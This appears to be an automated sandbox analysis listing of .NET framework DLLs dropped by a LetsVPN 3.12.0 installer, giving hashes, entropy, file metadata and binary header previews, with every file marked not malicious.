                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):194080
                                                                                                                                                                                                  Entropy (8bit):6.134658606305299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgQo/yV:bW60VcTvakcXcApOXDV
                                                                                                                                                                                                  MD5:1687F3EF97F927F0ADFBE36929435735
                                                                                                                                                                                                  SHA1:037F0E044A87E6629C5157DF735F395F1295A7F5
                                                                                                                                                                                                  SHA-256:580BCDF39C8795A5A157FC5B6A5A81BD91B388FBA1215A00ACA2DC58C87846A7
                                                                                                                                                                                                  SHA-512:59776468CC0B16E851653C841C8EEEEB26BC9ECC46A94A221FE409EB0467161FDCA504115B9EC69573103BABF8623CC4C41793E5A5CD1FB5D5406D1280535AA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ............@.....................................O.......h............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.461441279464388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:sVc1GUMB/z6XmY/iee5jq3b2KZBZqS+ST6nk8:sVcHMBm/ieWe3qKk/ma
                                                                                                                                                                                                  MD5:1E33798478F9452D30F03DAE6D1CDF19
                                                                                                                                                                                                  SHA1:B8E1560EA09E66746FFD869588E5E85E8C561713
                                                                                                                                                                                                  SHA-256:491C289BCB0634CAF386E0B175B548D0DD4C69EC44C74E31612B8A3B4B5EEDBB
                                                                                                                                                                                                  SHA-512:FCC55D7313633A896067E31CDE6BB13E0BEC48BBCD32E75384430F25985CECB51F1080C69D6724BAA6973058317019ED6653539CD89DA2D3621EDDCBDBB2F3BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..\..........r{... ........... ..............................p.....`..................................{..O.......h............h.. ...........0z..T............................................ ............... ..H............text....[... ...\.................. ..`.rsrc...h............^..............@..@.reloc...............f..............@..B................Q{......H.......D>..l;...................y.......................................0..v.........(.......i.Y...i.Zs.........(.......o.....0....(.....3...0o....&..o ...&..Y.+......(......0o!...o ...&..Y.../..o"...*6..r...p(#...*.0............(.......i.Y...i.[.X.Zs.......i.]..-......+....b......%.Y..X....Y..-....($........o.....0....(.....3...0o....&...o ...&+1.....b...Y..bX...Y.X......($.....0o!...o ...&..Y.../..o"...*...0..d.........(.......X...i.3..+.../......+......f...X....i.Y2...i.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948776506140675
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:m6ZWYLWZhqWOHlLf2KQcvBZ9wX74S+ShjmM6IGBkS4cI:m6l+q3b2KZBZEES+ST6nkBcI
                                                                                                                                                                                                  MD5:645261E4A9B6987F58E2DDBDE079B719
                                                                                                                                                                                                  SHA1:1F1FBCA97959753EB34EE48EBB53B9D7FBED89A4
                                                                                                                                                                                                  SHA-256:6E54116F6B216370C0B56EFF67E65C0C1FC36B9BC64EF2D7C6C99A8D522D6135
                                                                                                                                                                                                  SHA-512:12AA410EA7F9D4C36B947A2F33AB7B743BA795023D3EED547B784A94E58D8F7113C7239BCFB94EC692850DD2137409178F1E9039F2EF9CF79FE2E5E30264A953
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................R.....@.................................T(..O....@.. ............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.906079947109159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d1W1WMQWKhqWOHlLf2KQcvBZ9WyWS+ShjmM6IGBkSn:S1Aq3b2KZBZWS+ST6nkQ
                                                                                                                                                                                                  MD5:E3A134FCE26AD9447AA9CC22217AFB46
                                                                                                                                                                                                  SHA1:16F12C16877CA2FEFFCA363BAA5478C807A6AFAD
                                                                                                                                                                                                  SHA-256:5E06A39547C752DBCB496541D7D6CD35D31ABB4C2D93017F9069CB6CA5E5B751
                                                                                                                                                                                                  SHA-512:C76EC1D0D7CB548A29CD3E79AFE5D3982C89F0B21D9A6DE2C024E11EBFACD022C8CC892552789158722D889689B6D1C8BB855024FFC78C3BF944023C171E1709
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ....................................@..................................,..O....@..@............... ....`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9354694845948455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qdSWSKWxhqWOHlLf2KQcvBZ9WI1HS+ShjmM6IGBkS74:sOjq3b2KZBZsqS+ST6nkr
                                                                                                                                                                                                  MD5:50943D04E6FDBA897F3115A5BEDC4CCD
                                                                                                                                                                                                  SHA1:96372B2760B0E85EB076CE0235381B04BDAD9045
                                                                                                                                                                                                  SHA-256:E4D55BB6B22194E1A1688D53B2F96593B93F5D8DF490AD6EFF7D416D2023B4D2
                                                                                                                                                                                                  SHA-512:EBEB12EB99049FA291160B745250B7105F21941A45FA3206D51F67F78F799EF64D2363A28AC4C5C4A6C0602E668BF0A1E5BE5AE745B1406B986A252AF3243CF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................t.....@..................................(..O....@.................. ....`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.864133838979022
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UJEYA2WkIWhhqWOHlLf2KQcvBZ9pZbS+ShjmM6IGBkSY:UyYA8Zq3b2KZBZhS+ST6nkL
                                                                                                                                                                                                  MD5:2E9048F3BD9B2666999D08460F6270B8
                                                                                                                                                                                                  SHA1:09F1DDF20F750D87161A39342E0597AD417D812D
                                                                                                                                                                                                  SHA-256:43E2003D5DBAB917467CFA17939CB4F499B7DC2A013F2E91915295A393382B1F
                                                                                                                                                                                                  SHA-512:053C7390459C2CE7B103402DA54A87B71B9FFA6B73A55D3CA7FF7BD420D410AB075C1635B4794E31564EA28B275E144C8F33EE13750ECAE7A06B5D549BEE4479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ....................................@................................. ,..O....@.................. ....`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l.......#~..|...x...#Strings............#US.........#GUID...........#Blob......................3......................................$.........N.U.....U.....-...u.................0...........n.........................>.......................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9801791052871645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ljJGWe4WIhqWOHlLf2KQcvBZ93vQS+ShjmM6IGBkSaDO:TmOq3b2KZBZWS+ST6nk1K
                                                                                                                                                                                                  MD5:353F86DA020852C31535C10570730236
                                                                                                                                                                                                  SHA1:F323622AB32B5E2C680C774B5ECD37F6A9831C67
                                                                                                                                                                                                  SHA-256:09D926F8783774091E8E16CDE50E1C1A02EB257C6551BE6DE826B49E53905B13
                                                                                                                                                                                                  SHA-512:11F5770EDDB93C78F9EAFA76033E8438B96220B8ACBA95BAD7CCCE478961AD91AB4E4BD7878C852E2817059FAB457C34995C410F40203777A77B05D8F42BC81E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................0)..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d)......H.......P ..(...................x'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings............#US.........#GUID...........#Blob......................3..................................................4...~.4...R.!...T.....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.899550672496046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rxdW1w3WesW9hqWOHlLf2KQcvBZ9q7S+ShjmM6IGBkSJ:ru1wxNq3b2KZBZES+ST6nkS
                                                                                                                                                                                                  MD5:D231E241020D93712DE8A195A6A40000
                                                                                                                                                                                                  SHA1:BC6884E64295EA65467C89748EB01563E8D53FA1
                                                                                                                                                                                                  SHA-256:97ECEE66FF62BBF5ECEE95876E18CF9389258A3CF97FA8EBB8381CDE14BFA829
                                                                                                                                                                                                  SHA-512:11652F0CC85136AA9AAFBA7E0611E6196AD8E912604E5A40A4323B413A70C4943F67E90E5B6B8578A7710FAB9EBEFB412A93CF8E0919810D4198FEBECAB76D2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............~*... ...@....... ....................................@.................................,*..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`*......H.......P ..$...................t(......................................BSJB............v4.0.30319......l...$...#~......t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.<.....<.....<...C.<.....<.....<...[.<...x.<...-.......<.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.0...K.P...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26144
                                                                                                                                                                                                  Entropy (8bit):6.6921368213375345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Hyp12Bhkg3qnV/sErq3b2KZBZgS+ST6nkUu:w12zkg3qV/sE23qKW/mR
                                                                                                                                                                                                  MD5:98DB5D03B1515001435A0FBA8BA52123
                                                                                                                                                                                                  SHA1:646BC0EF11273748ACA1682F036862391C1571F5
                                                                                                                                                                                                  SHA-256:5489D1EE790F9E818BB4DB0042DD105615386B10AEE5ACCE357F32B48BBBAFDB
                                                                                                                                                                                                  SHA-512:75FC8940B4423F9455D18F039D65E1858C3F0A5950B6303640220B15DBBE390479007953ADA5C48BED0236D9DFBF04BE47AE2AE2FD6BA0F27846BD45F4C2B7F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..*...........I... ...`....... ...................................@.................................gI..O....`...............8.. ............H............................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............6..............@..B.................I......H.......H(... ..................HH.......................................0..J.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%......o....*...0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..K.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%.......o...+*..0..L.......(....~....%-.&~..........s....%.....~....%-.&~..........s....%........o...+*.0..L.......(....~....%-.&~..........s....%.....~....%-.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96273202505333
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vHPAW1bWXhqWOHlLf2KQcvBZ9doS+ShjmM6IGBkSuiJl:nrAq3b2KZBZES+ST6nkcl
                                                                                                                                                                                                  MD5:F672FB804EA4BAB0D33ACA3113EFBB80
                                                                                                                                                                                                  SHA1:EF9535A08CB9F9ECF79064BBA08A9DD1CFE544DE
                                                                                                                                                                                                  SHA-256:E8B42014F94A851E2E66AB964E8D96FDCC6E53492F79939C5E8392D7023630A2
                                                                                                                                                                                                  SHA-512:DE03A0697BC307068E40CC7C222212D14E3111ED053F951F7A322145AB2401BE2B82DF31D8900A9869BB42A1E99907B43469806A1858F856B7EBA3DBA7691B5F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P............... ....`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.961231388184548
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WNoqWD7WehqWOHlLf2KQcvBZ9LYWnS+ShjmM6IGBkSEO:WNofXq3b2KZBZacS+ST6nku
                                                                                                                                                                                                  MD5:A1F43C6D3477069B1B95862F64AEBBBA
                                                                                                                                                                                                  SHA1:64F5CF2A3339AB312CE62F0C4798B8B593EF31A0
                                                                                                                                                                                                  SHA-256:964560E4A4B6F28313374D54E91AAB94B7E8D69EF602BF8097B542E2C24CAEF1
                                                                                                                                                                                                  SHA-512:833C5004DE4A309139F077971DED62A62D45D58EE91DA86F53BAA4F1ADB36DABD0A9F754A263F35A11E6F76726E115794AFD387F1A94C80100B0DFC1979A8391
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................c....@.................................|(..O....@..@............... ....`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971342636879885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3GETSAWUEWWhqWOHlLf2KQcvBZ9ifYS+ShjmM6IGBkSx:rT18q3b2KZBZyYS+ST6nkG
                                                                                                                                                                                                  MD5:E0E4EF5AEA0AE7E6BC065FFEB26CD09B
                                                                                                                                                                                                  SHA1:8B17220D5815337590549CAF18784A66485D3E76
                                                                                                                                                                                                  SHA-256:AF3258FCF4FBE8B8A0A89AFEAC28E487A8BEAD824465C5A24B773197C5E27C5F
                                                                                                                                                                                                  SHA-512:302391EFDD8D40A07498C77E8CB0ADA87B0898ACEDDFACFAC53026A19746B5694E05107C84B85CDBD56B5F0A2D6AFD2C310FE7D990CEB91774334C7C591185CD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111648
                                                                                                                                                                                                  Entropy (8bit):5.56134106992795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/f3qKfuo/m1:kWw0SUUKBM8aOUiiGw7qa9tK/fio/O
                                                                                                                                                                                                  MD5:44D0AB5E4D54C2EDB7C8FBA9CED026ED
                                                                                                                                                                                                  SHA1:04328EE0F3BBCD8D0567A530431FFCF24CFF58B7
                                                                                                                                                                                                  SHA-256:FBB6E048E1A2FBB2EE2A9D20070DFF1D91155670F37241960B3F119F5DBE4ED1
                                                                                                                                                                                                  SHA-512:B7E31CC9F9C86F2F31B8340EFF76F9777402AD0B0D470B5D8245D2B0067F1F101C0E84218ED8CE7BE9DDA217FC5EA5808155133E3FA2709292252E9BEA0B9EC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ....................................@.................................f...O....................... ........................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.953385301880804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KcDagtDApWSKJWmhqWOHlLf2KQcvBZ9AQSS+ShjmM6IGBkSl:KPKBlq3b2KZBZSS+ST6nki
                                                                                                                                                                                                  MD5:B0F855439076CBAE234ADC363FA0454A
                                                                                                                                                                                                  SHA1:AA2AFB641C8AC4FD2A4796877A77C846AA287259
                                                                                                                                                                                                  SHA-256:4FC68C92932A97435D5996357A89BD6995449591777795E9A42C5063243550C7
                                                                                                                                                                                                  SHA-512:708C1F9B0593CE52A76AE33117C5736BA7B2C4BF006A6D1CF9925550D2620FDB8BA963800863CF89958CBD6AED803419F1C71449D458B50F585327CA9AE749E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ....................................@.................................0+..O....@.................. ....`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962671992726357
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7IWD4WkhqWOHlLf2KQcvBZ9TW4rS+ShjmM6IGBkSW:71Sq3b2KZBZI4rS+ST6nkd
                                                                                                                                                                                                  MD5:B01A80E33A269BF097DBD547BB235468
                                                                                                                                                                                                  SHA1:4BE2ADF5E7EF0BE39D2D917B7B91460396CF8D41
                                                                                                                                                                                                  SHA-256:ABA7106AAA97C956C535990A878CE66DEFE54F064C7616DD2DBF8A9EB6D44ACE
                                                                                                                                                                                                  SHA-512:39FD2FCCEC11F6906CFE453FFE784A98762918BDBB82C47868CC7E3F6CA4EC314DA717D3F3BF5DF50274D9026BF4DBCE5271BD485710BF3A88F471F714705C1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................h7....@..................................(..O....@..@............... ....`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89896808782791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BMWzQWjhqWOHlLf2KQcvBZ9RDS+ShjmM6IGBkS5Pz:B5rq3b2KZBZbS+ST6nkWb
                                                                                                                                                                                                  MD5:264B3192B5C2C364C8B9AE2790B19153
                                                                                                                                                                                                  SHA1:92CD47F6707C0C598A23973C27BDA209108E0D7B
                                                                                                                                                                                                  SHA-256:06B51B094FAF31639B7B3F7B9569BC7B46A24BFB4BF4E726854503AA3B558C19
                                                                                                                                                                                                  SHA-512:A1CAFAB90CDAE27CB71BEFEE3BDAF8981E93D5B8C11E1E27186C6B721BC2BE05C2DADA828D723A3E3EBFF4AE3C93736472ED9BE645815FE5E1262AC514E0B182
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
